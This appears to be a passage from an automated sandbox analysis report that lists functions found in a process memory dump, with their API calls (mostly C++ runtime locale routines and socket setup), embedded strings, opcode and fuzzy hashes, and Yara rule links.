                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: fabe8663783be61be284b94af664b9a8e0e602f0293f34d5d5b890ced11b4cb5
                                                                                                                                                        • Instruction ID: bd4947e7f6702c05411a057a98c165b2866aa9d59eebb32bdac75f5d3c1f4262
                                                                                                                                                        • Opcode Fuzzy Hash: fabe8663783be61be284b94af664b9a8e0e602f0293f34d5d5b890ced11b4cb5
                                                                                                                                                        • Instruction Fuzzy Hash: 7601C435E0021A9BCF01FBA0E81AABD7B7ABF84360F54811EF5147B291DF389D029795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E883, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E88A
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E894
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E8B4
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E8EB
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E90A
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E913
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 6c37b8286b42915790edabadffc40dc803d35ad8599f60fb6f8a3fc9865c93aa
                                                                                                                                                        • Instruction ID: 0605de5de5d7d0682c1eff9b3640b42e69ac869223a1b5a31eb20d074bd4b37e
                                                                                                                                                        • Opcode Fuzzy Hash: 6c37b8286b42915790edabadffc40dc803d35ad8599f60fb6f8a3fc9865c93aa
                                                                                                                                                        • Instruction Fuzzy Hash: 0901E532D0021A9BCF05FF60DC06AAD7B36BF84360F54451EE5086B291DF389D02D794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E920, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E927
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E931
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E951
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E988
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E9A7
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E9B0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: a91264d065196418cd95457464640b59262fa7f9c7bc54f8c12acd2a7291fbe6
                                                                                                                                                        • Instruction ID: 0a07c6b17e7d99e8f9c045659a922505dddf0ec7e2ce40df1b09c5216d064eb5
                                                                                                                                                        • Opcode Fuzzy Hash: a91264d065196418cd95457464640b59262fa7f9c7bc54f8c12acd2a7291fbe6
                                                                                                                                                        • Instruction Fuzzy Hash: C801A532D0021A9BCF01FFA0D846ABD7776BF84750F54811EE5156B2A1DF389D02D795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057EAF7, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057EAFE
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057EB08
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057EB28
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057EB5F
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057EB7E
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057EB87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 3851929f38a1a43fbb1fee8e5053392524f5f72e0d0578ac00430cb96c7b4f6d
                                                                                                                                                        • Instruction ID: ade1e44851079c12a18bd5dc2cec5c4a732975b2565027a8ce5a58b3585d77bb
                                                                                                                                                        • Opcode Fuzzy Hash: 3851929f38a1a43fbb1fee8e5053392524f5f72e0d0578ac00430cb96c7b4f6d
                                                                                                                                                        • Instruction Fuzzy Hash: 2E01E135E0021A9BCF01FB60D846AAD7B76BF84360F54810EE5096B2A1DF389D029795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057EB94, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057EB9B
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057EBA5
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057EBC5
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057EBFC
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057EC1B
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057EC24
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 1454db6448cad37971ef1d98dfdc978ff7a2b346f74b2ccfd2314412d1f44c19
                                                                                                                                                        • Instruction ID: 5538039f3f819057d4454404a54a9993722439d4c10eed927dd9db40ee9c45e6
                                                                                                                                                        • Opcode Fuzzy Hash: 1454db6448cad37971ef1d98dfdc978ff7a2b346f74b2ccfd2314412d1f44c19
                                                                                                                                                        • Instruction Fuzzy Hash: A501E535D0011A9BCF01FBA0DC56ABD7B3ABF84350F54451EE5096B291DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057EC31, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057EC38
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057EC42
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057EC62
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057EC99
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057ECB8
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057ECC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 5f2427f4d35e1604f91b7200594db551dbe7662fdd5c54d7df5151c455bdf523
                                                                                                                                                        • Instruction ID: 438c5a5b9d52ca99d96f91b11f069ed544e0b3f32f79223ef191d4c52e0bf1b5
                                                                                                                                                        • Opcode Fuzzy Hash: 5f2427f4d35e1604f91b7200594db551dbe7662fdd5c54d7df5151c455bdf523
                                                                                                                                                        • Instruction Fuzzy Hash: FD01A535D0011A9BCF02FB60D80AAED7B7ABF94750F54815EE5056B2E1DF389D019794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057ECCE, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057ECD5
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057ECDF
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057ECFF
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057ED36
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057ED55
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057ED5E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: f2c89010aad4acfa32a05cf578528feee7f1a9ab0f77d508344d32c022b0807e
                                                                                                                                                        • Instruction ID: 23057464108a21b1986c394ea9b1de5068b8f13cf3a1575239681e422eacbba2
                                                                                                                                                        • Opcode Fuzzy Hash: f2c89010aad4acfa32a05cf578528feee7f1a9ab0f77d508344d32c022b0807e
                                                                                                                                                        • Instruction Fuzzy Hash: 4701C432E0021A9BCF11FB60D816AFD7B76BF94720F54855EE5086B2A1DF389D029794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0058B187, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0058B18E
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0058B198
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0058B1B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0058B1EF
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0058B20E
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B217
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 04b6fa23cc5f396b8bfe0f8219539a98b2e08f0b08f2d3ec1356bf8592555993
                                                                                                                                                        • Instruction ID: da8d3501645419f198c199d2839c52c647463e888eeb860a64112cda8cdc6255
                                                                                                                                                        • Opcode Fuzzy Hash: 04b6fa23cc5f396b8bfe0f8219539a98b2e08f0b08f2d3ec1356bf8592555993
                                                                                                                                                        • Instruction Fuzzy Hash: CC01E531E0011A9BDF01FBA0D85AABD773ABF80320F54450EE5157B291DF389D02C794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0058B224, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0058B22B
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0058B235
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0058B255
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0058B28C
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0058B2AB
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B2B4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: e132bc3c9e0238a3126e99ea2496b9a0252ac17bc4a2c2fe0bf5877b317375c4
                                                                                                                                                        • Instruction ID: a3513e0cf8958189b1875b86f108878d2215263c6c724b992b13ea9760ab36e8
                                                                                                                                                        • Opcode Fuzzy Hash: e132bc3c9e0238a3126e99ea2496b9a0252ac17bc4a2c2fe0bf5877b317375c4
                                                                                                                                                        • Instruction Fuzzy Hash: 7301C435E0011A9BDF01FBA0D859AFD7B7ABF80720F94821EE9157B291DF389D028794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0058B3FB, Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0058B402
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0058B40C
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0058B42C
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0058B463
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0058B482
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B48B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2465509477-0
                                                                                                                                                        • Opcode ID: 67b5e20ec2aacde2591dea3cd844436ba5208034aa76950e012ea0da76d9e101
                                                                                                                                                        • Instruction ID: 56fba4920423b387ea6c1808c15e06b455224c2b603599a5e6b6d58965df7aba
                                                                                                                                                        • Opcode Fuzzy Hash: 67b5e20ec2aacde2591dea3cd844436ba5208034aa76950e012ea0da76d9e101
                                                                                                                                                        • Instruction Fuzzy Hash: 7A01C431E0011A9BDF01FBA0D846ABD7B7ABF94760F94451EF9147B2A2DF389D028794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00424E50, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 252COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00424E55
                                                                                                                                                          • Part of subcall function 00415DA9: WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415DBC
                                                                                                                                                        • htonl.WS2_32(7F000001), ref: 00424EEF
                                                                                                                                                        • htonl.WS2_32(00000000), ref: 00424F46
                                                                                                                                                        • htonl.WS2_32(7F000001), ref: 00424F52
                                                                                                                                                          • Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: htonl$H_prolog$Socket
                                                                                                                                                        • String ID: socket_select_interrupter
                                                                                                                                                        • API String ID: 2867122483-3103927870
                                                                                                                                                        • Opcode ID: c7796ade1f41e567cce588a354097aec9e17b8cb4831c4dc48970e434642c499
                                                                                                                                                        • Instruction ID: d8932cf7951f55d5c6c2f4ea399c89b8893e0b59eaea3f882a9e05c1fff9c1a0
                                                                                                                                                        • Opcode Fuzzy Hash: c7796ade1f41e567cce588a354097aec9e17b8cb4831c4dc48970e434642c499
                                                                                                                                                        • Instruction Fuzzy Hash: B291F771E01208ABDF14DBA5E941BEEB7B9DF84324F20422BF521A72C1EB785E458B54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0051ED0B, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 185COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: 0 <= _dims && _dims <= CV_MAX_DIM$The total matrix size does not fit to "size_t" type$cv::setSize$s >= 0
                                                                                                                                                        • API String ID: 3519838083-1770251609
                                                                                                                                                        • Opcode ID: 0b122555798ba238e0b0ba7f964afbbb499c51886e38249b71316d60e133c200
                                                                                                                                                        • Instruction ID: e5662c2855b2d35897ba5f07421cd54dad025f4d97eeb561509d93a3b6e65b7f
                                                                                                                                                        • Opcode Fuzzy Hash: 0b122555798ba238e0b0ba7f964afbbb499c51886e38249b71316d60e133c200
                                                                                                                                                        • Instruction Fuzzy Hash: 9471F371900309DFEB24DFA4C986BEDBBB5FF54304F14822EE50697291EB74AA85CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057AFEE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __Getcvt.LIBCPMT ref: 0057B046
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000,?,?,00000000), ref: 0057B094
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 0057B106
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 0057B12E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$Getcvt
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 3195005509-2802557318
                                                                                                                                                        • Opcode ID: 5b6d91d9fc10474093c9fd328c579439a95194d0733ca1cc2ba249ae7d9f4687
                                                                                                                                                        • Instruction ID: 817d2636629a9579f51fe3816d624a65d51a02ddc0dd660ab6097459060bc077
                                                                                                                                                        • Opcode Fuzzy Hash: 5b6d91d9fc10474093c9fd328c579439a95194d0733ca1cc2ba249ae7d9f4687
                                                                                                                                                        • Instruction Fuzzy Hash: B4410231A00345EFEB218F64E849BBB7FE9BF41310F14892AE4298B191D771AC44EB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AEE84, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AEE89
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004AEFC9
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AEFF7
                                                                                                                                                          • Part of subcall function 004B15E8: __EH_prolog.LIBCMT ref: 004B15ED
                                                                                                                                                          • Part of subcall function 004B15E8: std::exception::exception.LIBCONCRT ref: 004B163C
                                                                                                                                                          • Part of subcall function 004B15E8: __CxxThrowException@8.LIBVCRUNTIME ref: 004B166A
                                                                                                                                                          • Part of subcall function 004B15E8: std::exception::exception.LIBCONCRT ref: 004B16A0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::exception::exception$Exception@8H_prologThrow
                                                                                                                                                        • String ID: ]sB$unexpected end of data
                                                                                                                                                        • API String ID: 1448338827-1396046059
                                                                                                                                                        • Opcode ID: 5f6286e1f07a237205790ef9dc93b93effe03d2978dd5b2eaf1bfcc9e078fce0
                                                                                                                                                        • Instruction ID: 47a25c688b2a28ef1afddb55dfa09fbaff01b6c35706859163b677aa32b1874c
                                                                                                                                                        • Opcode Fuzzy Hash: 5f6286e1f07a237205790ef9dc93b93effe03d2978dd5b2eaf1bfcc9e078fce0
                                                                                                                                                        • Instruction Fuzzy Hash: A04194B08051856DDB219B6684047A6FFA5EB37318F4882ABE5E44B343C37C89C6D75E
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004BA59D, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004BA5A2
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004BA72B
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004BA759
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8H_prologThrowstd::exception::exception
                                                                                                                                                        • String ID: ]sB$expected ;
                                                                                                                                                        • API String ID: 1340123063-1083820522
                                                                                                                                                        • Opcode ID: b550e0ab08222f7f77c92f204dcfa7b6444fc61e9ff65dad27dd98a2204f7691
                                                                                                                                                        • Instruction ID: 7348b9a7ba372f27c5bcf0f6294cf0445a7fb8f2a83b3670ac1012c88edf89bf
                                                                                                                                                        • Opcode Fuzzy Hash: b550e0ab08222f7f77c92f204dcfa7b6444fc61e9ff65dad27dd98a2204f7691
                                                                                                                                                        • Instruction Fuzzy Hash: 7741F5A0C482C449EB358B2884157FABFF14B16304F5C809FD0C553742C36E4D96A7AB
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A70EE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
